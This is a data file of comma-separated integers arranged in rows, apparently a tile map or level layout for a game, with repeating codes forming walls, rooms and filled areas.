7,0,0,0,0,0,0,0,0,34,26,26,31,0,0,0,4,4,0,0,0,0,0,0,51,0,0,0,0,0,0,0,40,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,7,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,0,14,0,0,8,4,9,0,50,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,4,0,0,0,51,6,1,1,1,1,1,1,1,1,1,1,1,7,
7,0,0,0,0,0,0,0,0,33,26,26,32,0,0,0,4,4,50,0,0,0,0,0,0,0,0,0,0,51,0,51,40,0,0,0,34,27,27,27,27,27,27,27,27,27,27,31,0,30,26,26,26,26,26,26,29,32,0,51,0,7,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,14,0,51,4,4,4,0,50,6,6,6,1,6,6,6,12,7,12,7,12,7,12,7,4,0,0,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,0,0,0,0,0,0,0,0,0,33,32,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,30,26,26,26,26,26,26,26,26,26,26,28,0,30,26,26,26,26,26,28,0,0,0,0,0,7,7,0,0,50,0,50,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,14,0,0,4,4,4,0,0,6,1,1,1,1,1,6,7,0,7,0,7,0,7,0,4,0,0,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,0,0,0,0,0,0,0,0,0,51,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,30,26,26,26,29,29,29,29,29,29,29,28,0,30,26,26,26,26,26,28,0,35,0,0,0,7,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,0,0,0,14,0,0,4,4,4,0,0,6,1,1,1,1,1,6,0,0,0,0,0,0,0,0,1,50,0,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,51,0,0,0,0,0,0,0,0,0,0,0,0,0,51,4,4,0,50,51,0,0,0,0,0,51,0,0,0,0,51,40,51,0,50,30,26,26,28,0,0,0,0,0,0,0,40,0,30,26,26,26,26,26,28,0,40,51,0,0,7,7,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,14,0,51,4,4,4,0,0,1,1,1,1,1,1,1,0,0,0,0,0,0,0,0,4,0,0,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,0,0,0,0,0,0,0,0,0,50,0,0,0,0,0,4,4,49,0,0,0,0,0,0,0,0,0,0,0,51,0,40,0,0,0,30,26,26,28,0,34,27,27,27,27,27,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,7,0,0,0,0,0,0,0,0,0,51,0,0,0,51,0,0,0,0,0,0,14,51,0,10,4,11,0,0,6,1,1,1,1,1,6,0,0,0,0,0,0,0,0,4,0,51,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,50,0,30,26,29,32,0,33,26,26,26,26,26,28,0,33,29,29,29,29,29,32,0,40,50,0,0,7,7,0,0,0,0,0,0,51,0,0,0,0,51,0,0,0,0,0,0,0,0,14,0,0,0,0,0,0,0,6,1,1,1,1,1,6,0,0,0,0,0,0,0,0,4,9,0,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,0,34,31,0,50,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,30,28,0,0,50,0,30,26,26,26,26,28,0,0,0,0,0,0,50,0,0,40,0,0,51,7,7,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,15,13,13,13,13,13,13,13,6,6,6,6,6,6,6,0,51,0,0,0,0,0,0,10,4,0,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,34,26,26,31,0,0,0,0,0,0,0,51,0,0,0,4,4,0,0,0,0,0,51,0,0,0,0,0,0,0,0,40,0,0,0,30,28,0,0,0,0,30,26,26,26,26,28,0,34,27,27,27,27,27,31,0,40,0,0,0,7,7,50,0,0,0,0,0,0,51,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,0,0,0,0,51,0,0,4,0,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,33,26,26,32,0,0,0,51,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,30,28,0,50,0,0,30,26,26,26,26,28,0,30,26,26,26,26,26,28,51,40,0,0,0,7,7,0,0,0,0,0,0,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,51,0,50,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,0,0,0,6,1,1,1,6,1,1,1,6,1,1,1,7,
7,0,33,32,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,50,0,0,0,40,0,0,0,30,28,0,0,0,0,33,29,29,29,29,32,0,30,26,26,26,26,26,28,0,40,50,0,0,7,7,0,0,0,0,0,0,6,6,6,6,6,6,6,13,13,13,18,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,4,9,0,0,6,6,6,6,6,6,1,6,6,6,6,6,7,
7,0,50,0,0,51,0,51,0,0,0,0,0,0,0,0,4,4,0,0,0,51,0,0,0,0,0,0,0,51,0,0,30,27,27,27,26,28,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,28,0,40,0,0,0,7,7,13,13,13,13,13,13,6,1,1,1,1,1,6,1,1,1,14,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,50,0,10,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,9,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,27,27,27,27,27,27,27,27,27,31,0,30,26,26,26,26,26,28,0,40,0,0,0,7,7,0,0,0,0,0,0,6,1,1,1,1,1,6,1,1,1,14,51,0,0,51,0,0,0,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,0,4,0,51,51,0,51,0,0,0,51,50,0,0,50,0,7,
7,0,0,0,0,34,31,0,0,0,0,0,51,0,0,0,10,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,33,29,29,29,29,29,29,29,29,29,29,29,29,29,26,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,7,0,0,0,0,0,0,6,1,1,1,1,1,1,1,1,1,14,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,7,
7,51,0,0,34,26,26,31,0,0,0,0,0,0,51,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,50,0,0,30,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,7,0,0,0,0,0,0,6,1,1,1,1,1,6,1,1,1,14,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,50,51,0,0,0,0,0,0,0,0,4,0,0,51,0,0,0,0,0,0,0,0,0,0,0,7,
7,0,0,0,33,26,26,32,0,51,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,34,27,27,27,27,27,27,27,31,0,0,0,0,0,30,28,51,30,26,26,26,26,26,28,0,40,0,0,0,7,7,0,51,0,0,0,0,6,1,1,1,1,1,6,1,1,1,14,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,50,0,0,0,0,0,7,
7,0,0,0,0,33,32,0,0,0,0,0,0,0,0,0,0,4,4,50,0,0,0,0,0,51,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,30,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,7,0,0,0,0,0,0,6,6,6,1,6,6,6,13,13,13,16,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,0,0,0,0,0,50,0,0,0,0,0,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,0,34,31,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,49,0,0,51,0,30,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,7,0,0,0,0,0,0,51,14,0,50,0,0,0,0,0,0,0,0,51,0,0,0,0,0,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,51,0,0,0,4,51,0,0,0,0,0,0,0,0,0,0,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,34,26,26,31,0,0,0,4,4,0,0,0,0,0,0,0,50,0,0,0,0,0,33,29,29,29,29,29,29,26,28,0,0,0,0,0,30,28,0,30,26,26,26,26,26,28,0,40,0,0,51,7,7,0,0,0,0,0,0,0,14,0,0,0,0,0,0,0,0,0,0,0,0,51,0,51,0,0,51,0,0,0,0,0,0,0,0,0,0,0,51,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,33,26,26,32,0,0,0,4,4,0,50,0,51,0,0,0,0,0,0,50,0,50,0,0,0,0,0,0,0,30,26,27,27,27,27,27,26,32,0,33,26,26,26,26,26,28,0,40,0,0,0,7,7,0,51,0,0,0,0,0,14,0,0,0,51,0,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,0,0,0,0,0,4,0,0,0,0,0,0,0,51,0,0,0,0,0,0,7,
7,0,0,0,34,31,0,51,0,0,0,33,32,0,0,0,0,4,4,0,51,0,0,0,0,0,0,0,0,0,0,0,0,7,0,7,0,7,0,30,26,26,26,26,29,29,32,0,0,0,33,29,26,26,26,28,0,40,0,0,0,7,7,0,0,0,0,0,50,0,14,0,0,0,0,0,0,0,0,0,0,51,50,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,8,4,4,4,4,4,4,9,0,51,0,0,0,0,0,0,0,7,
7,0,0,0,30,28,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,50,0,51,0,0,0,0,7,12,7,12,7,50,0,30,26,26,26,28,0,0,0,0,0,0,0,0,30,26,26,28,50,40,0,51,0,7,7,0,0,0,0,0,0,0,14,0,0,0,0,51,0,0,0,51,0,0,0,0,0,0,50,0,0,0,0,0,0,51,0,0,0,0,0,0,0,0,50,50,0,0,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,7,
7,0,0,34,26,26,31,0,0,0,0,0,0,0,0,0,0,4,4,9,0,0,0,0,0,0,0,0,0,0,0,0,0,7,12,7,12,7,0,30,26,26,26,28,0,0,0,0,0,51,0,0,30,26,26,28,0,40,0,0,0,7,7,0,0,6,6,6,6,6,6,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,51,0,7,
7,0,0,33,26,26,32,0,50,0,0,0,0,0,0,0,0,10,4,4,0,0,0,0,0,0,0,0,0,0,51,0,7,12,7,12,7,0,0,33,29,29,29,32,0,0,0,0,0,0,0,0,30,26,26,28,50,40,0,0,0,7,7,0,0,6,1,1,1,1,1,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,0,51,0,0,0,50,0,0,0,0,0,51,0,0,0,4,4,4,4,4,4,4,4,0,0,50,51,0,0,0,0,0,7,
7,0,0,0,30,28,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,7,12,7,12,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,28,51,40,0,0,51,7,7,0,0,6,1,1,1,1,1,6,0,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,0,0,0,0,0,0,51,0,0,7,
7,0,0,0,33,32,0,0,0,0,0,51,0,0,0,0,50,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,7,12,7,12,7,0,0,34,27,27,27,31,0,0,0,0,0,0,0,0,30,26,29,32,0,40,0,0,0,7,7,0,0,6,1,1,1,1,1,1,0,0,0,0,6,6,1,6,6,6,6,6,1,6,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,7,12,7,12,7,0,30,26,26,26,28,0,0,0,0,0,0,0,0,30,28,0,0,0,37,0,0,0,7,7,0,0,6,1,1,1,1,1,6,0,0,0,0,6,1,1,1,1,1,1,1,1,1,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,0,0,0,0,51,0,51,0,0,7,
7,0,0,0,0,0,0,0,34,31,0,0,0,0,0,0,0,0,4,4,0,0,0,0,50,0,0,0,0,0,0,0,7,12,7,12,7,0,0,30,26,26,26,28,0,0,0,51,0,0,0,0,30,28,0,35,0,0,0,0,0,7,7,0,0,6,1,1,1,1,1,6,0,0,0,0,6,1,1,1,1,1,1,1,1,1,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,4,4,4,4,4,4,4,4,0,0,0,51,0,0,0,0,0,7,
7,0,0,0,0,0,0,34,26,26,31,0,0,0,0,0,0,0,4,4,50,51,0,0,0,0,0,0,0,0,0,0,0,7,0,7,0,7,0,30,26,26,26,26,27,27,27,27,27,27,27,27,26,28,0,40,0,35,0,0,0,7,7,0,0,6,1,1,1,1,1,6,50,0,0,0,6,1,1,1,1,1,1,1,1,1,6,0,0,0,50,0,0,0,51,0,0,0,0,0,0,0,0,0,50,0,4,4,4,4,4,4,4,4,0,0,0,0,0,51,0,0,0,7,
7,0,50,0,0,0,0,33,26,26,32,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,0,0,0,30,26,29,29,29,29,29,29,29,29,26,26,26,26,28,51,40,0,40,0,0,0,7,7,0,0,6,1,1,1,1,1,6,0,0,0,0,6,1,1,1,1,1,1,1,1,1,6,51,0,0,0,0,0,0,0,0,0,51,50,0,0,0,0,0,0,0,10,4,4,4,4,4,4,11,0,0,0,0,0,0,0,0,0,7,
7,0,0,0,0,0,0,0,33,32,0,0,0,0,0,51,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,34,27,27,27,27,27,27,26,28,0,0,51,0,0,0,0,0,30,26,26,26,28,0,40,0,40,0,0,0,7,7,0,50,6,1,1,1,1,1,6,0,0,0,0,6,6,6,6,6,6,6,6,6,6,6,0,0,6,6,1,6,6,6,6,6,6,6,6,6,1,6,6,0,0,0,0,0,0,0,10,4,0,51,0,0,0,0,0,0,0,0,7,
7,0,34,31,50,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,51,0,0,33,29,29,29,32,0,40,0,40,0,0,51,7,7,0,0,6,1,1,1,1,1,6,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,6,1,1,1,1,1,1,6,1,1,1,1,1,1,6,51,0,0,0,0,0,0,0,4,0,51,0,0,0,0,0,0,0,0,7,
7,34,26,26,31,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,50,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,40,0,0,0,7,7,0,0,1,1,1,1,1,1,6,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,6,1,1,1,1,1,1,6,1,1,1,1,1,1,6,0,0,0,0,0,0,0,0,1,51,0,0,0,0,0,50,0,0,0,7,
7,33,26,26,32,0,0,0,0,51,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,51,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,0,0,0,38,39,39,39,39,39,32,0,40,0,0,0,7,7,0,0,6,1,1,1,1,1,6,0,0,0,50,0,0,0,0,0,0,0,0,51,0,0,0,0,6,1,1,1,1,1,1,6,1,1,1,1,1,1,6,0,0,0,0,0,0,0,51,4,51,0,0,0,0,0,0,0,0,50,7,
7,50,33,32,0,0,0,0,0,0,51,0,51,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,7,7,0,0,6,6,6,6,6,6,6,0,0,0,0,0,51,0,0,0,0,0,0,0,51,0,0,0,6,1,1,1,1,1,1,6,1,1,1,1,1,1,6,0,0,0,0,0,0,0,0,4,0,0,0,0,0,50,0,0,0,0,7,
7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,
7,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,7,7,0,0,0,0,0,0,0,50,0,34,31,0,0,0,0,4,4,51,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,33,29,29,29,29,29,29,29,29,29,29,29,29,26,26,26,26,26,26,26,26,28,0,0,0,7,
7,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,7,7,0,0,0,0,0,0,0,0,34,26,26,31,0,0,0,4,4,0,0,0,0,0,0,0,51,0,0,0,0,0,51,40,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,30,26,26,26,26,26,26,26,28,0,0,0,7,
7,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,11,0,0,0,10,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,7,7,0,0,0,0,0,0,0,0,33,26,26,32,0,0,50,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,51,0,0,34,27,27,27,27,27,27,27,27,27,27,31,0,30,26,26,26,26,26,26,29,32,0,0,0,7,
7,4,4,4,4,4,4,4,11,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,10,4,4,4,4,4,4,4,4,51,0,51,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,0,7,7,0,0,0,0,0,0,0,0,0,33,32,0,0,0,50,4,4,0,0,0,0,0,0,0,0,0,0,0,51,0,51,40,0,0,0,30,26,26,26,26,26,26,26,26,26,26,28,0,30,26,26,26,26,26,28,0,0,0,0,0,7,
7,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,50,0,0,0,51,0,0,0,0,0,4,4,4,4,4,4,4,4,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,7,7,0,0,0,51,0,51,0,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,0,0,0,0,51,0,0,0,40,0,0,0,30,26,26,26,29,29,29,29,29,29,29,28,0,30,26,26,26,26,26,28,0,35,0,0,0,7,
7,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,50,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,9,0,0,50,0,50,0,7,7,0,51,0,0,0,0,0,0,0,0,51,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,30,26,26,28,0,0,0,0,0,0,0,40,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,4,4,11,51,10,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,9,0,0,0,8,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,7,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,49,0,0,0,0,51,0,0,0,0,0,0,0,0,40,0,51,0,30,26,26,28,0,34,27,27,27,27,27,28,0,30,26,26,26,26,26,28,0,40,51,0,0,7,
7,4,4,0,0,0,4,4,0,0,0,0,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,7,7,0,0,0,0,0,0,0,0,0,0,0,0,0,0,51,4,4,0,50,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,30,26,29,32,0,33,26,26,26,26,26,28,0,33,29,29,29,29,29,32,0,40,0,0,0,7,
7,4,4,50,0,0,1,1,0,0,0,0,0,0,0,0,0,51,0,0,0,0,0,0,0,51,0,8,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,7,7,0,34,31,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,51,0,0,0,51,0,0,0,0,0,40,0,51,51,30,28,0,0,0,0,30,26,26,26,26,28,0,0,51,0,0,0,0,0,0,40,0,51,51,7,
7,4,4,9,0,8,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,7,7,34,26,26,31,0,0,0,0,0,51,0,51,51,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,30,28,0,0,0,0,30,26,26,26,26,28,0,34,27,27,27,27,27,31,0,40,0,0,0,7,
7,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,7,7,33,26,26,32,0,0,0,0,0,51,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,0,30,28,0,0,0,0,30,26,26,26,26,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,7,7,0,33,32,0,0,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,40,0,0,51,30,28,0,0,0,0,33,29,29,29,29,32,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,7,7,0,0,0,0,0,0,0,0,51,0,0,0,0,50,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,51,0,30,27,27,27,26,28,0,0,0,0,0,0,0,0,51,0,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,11,0,0,0,10,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,7,7,0,0,0,0,50,0,0,0,0,0,0,0,0,0,0,4,4,9,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,27,27,27,27,27,27,27,27,27,31,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,0,0,0,0,0,4,4,4,4,4,4,11,0,0,0,0,0,51,0,0,0,0,0,10,4,4,4,7,7,0,0,0,0,34,31,0,0,50,0,0,51,0,0,0,10,4,4,0,51,0,51,0,0,0,0,0,0,0,0,0,33,29,29,29,29,29,29,29,29,29,29,29,29,29,26,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,51,0,0,0,0,4,4,4,4,4,4,0,7,0,0,0,0,0,0,51,0,0,0,0,4,4,4,7,7,0,0,0,34,26,26,31,0,0,0,0,0,0,0,0,0,4,4,0,0,51,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,30,28,51,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,0,0,0,0,0,1,1,1,1,1,1,0,0,0,0,0,0,0,0,0,0,0,7,0,4,4,4,7,7,0,0,0,33,26,26,32,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,51,50,0,0,0,34,27,27,27,27,27,27,27,31,0,0,0,0,0,30,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,0,0,0,50,0,0,0,0,10,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,9,0,0,0,8,4,4,4,4,4,4,0,0,0,0,7,0,0,0,0,0,0,0,0,4,4,4,7,7,0,0,0,0,33,32,0,0,0,0,0,0,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,0,0,0,0,0,30,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,7,7,0,0,0,0,0,0,0,0,0,0,34,31,0,0,0,50,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,26,26,26,26,26,26,28,49,0,0,0,0,30,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,0,50,0,0,0,0,51,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,1,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,0,7,51,0,0,0,0,51,0,0,0,0,0,4,4,4,7,7,0,0,0,0,0,0,0,0,0,34,26,26,31,0,0,0,4,4,51,0,0,0,0,0,0,0,0,0,0,0,51,33,29,29,29,29,29,29,26,28,50,0,0,0,0,30,28,0,30,26,26,26,26,26,28,0,40,0,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,11,0,0,0,0,0,0,0,10,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,7,7,0,50,0,0,0,0,0,0,0,33,26,26,32,0,51,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,30,26,27,27,27,27,27,26,32,0,33,26,26,26,26,26,28,50,40,50,0,0,7,
7,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,50,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,51,0,0,0,4,4,4,7,7,0,0,0,34,31,0,0,51,51,0,33,32,0,0,0,0,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,7,0,7,0,7,0,30,26,26,26,26,29,29,32,0,51,0,33,29,26,26,26,28,0,40,0,0,0,7,
7,0,0,0,0,0,50,0,0,0,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,4,1,51,0,0,51,0,51,0,0,7,0,0,50,0,4,4,4,7,7,0,0,0,30,28,0,0,51,0,51,0,0,0,0,0,0,4,4,0,0,0,0,0,51,0,0,0,0,0,0,0,7,12,7,12,7,0,0,30,26,26,26,28,50,0,0,0,0,0,0,0,30,26,26,28,0,40,0,0,0,7,
7,0,50,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,4,4,4,0,0,0,0,0,7,0,0,0,51,0,0,0,4,4,4,7,7,0,0,34,26,26,31,0,0,0,0,0,0,0,0,0,0,4,4,9,0,0,0,0,51,0,0,0,0,0,0,0,0,7,12,7,12,7,0,30,26,26,26,28,0,0,0,0,0,0,0,0,30,26,26,28,0,40,0,0,0,7,
